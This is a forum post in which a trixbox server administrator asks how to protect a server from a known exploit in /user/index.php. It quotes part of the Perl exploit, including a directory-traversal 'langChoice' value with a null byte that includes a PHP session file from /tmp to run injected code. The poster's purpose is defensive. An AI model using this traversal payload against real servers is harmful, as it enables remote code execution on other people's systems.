tribox problem

[adv]

hello i have tribox installed and recently i found out that there is an exploit with connect-back that u can get access to the server

the problem is in the /user/index.php

i found out the exploit and its made in perl

 

usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar);

menu();

sub execScript{
    my $scriptCode = shift;
    post($scriptCode);
    my $phpsessionid = extractPHPSID($cookie_jar->as_string);
    post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
}

 

its getting access to /tmp .. ive tried to chmod 755 /tmp but the index doesnt work it gives an error

 

<?php

apache_setenv('QUERY_STRING',$_SERVER["QUERY_STRING"] = addslashes(strip_tags(urldecode($_SERVER["QUERY_STRING"]))));
apache_setenv('REQUEST_URI',$_SERVER["REQUEST_URI"] = addslashes(strip_tags(urldecode($_SERVER["REQUEST_URI"]))));
ini_set("error_reporting","E_ALL & ~E_NOTICE");
        //session_start();
        require 'includes/smartysetup.php';
 require_once("includes/xajax.inc.php");
        include "includes/tbversion.php"; // Grabs version of TrixBox from file /etc/trixbox/trixbox-version
        $smarty->assign("tbversion",tbversion());
        $smarty->assign("title","trixbox - User Mode");
...
?>

 

ive tried to to comment sesion_start(); it works but does it gives any problems?

how to i secure it to keep hackers out?

[adv]

hello .. plz anybody?? :|

[adv]

sorry about the topic : i ment to be " trixbox problem "

 

and doesnt anybody know what to do ?

how do i secure ittt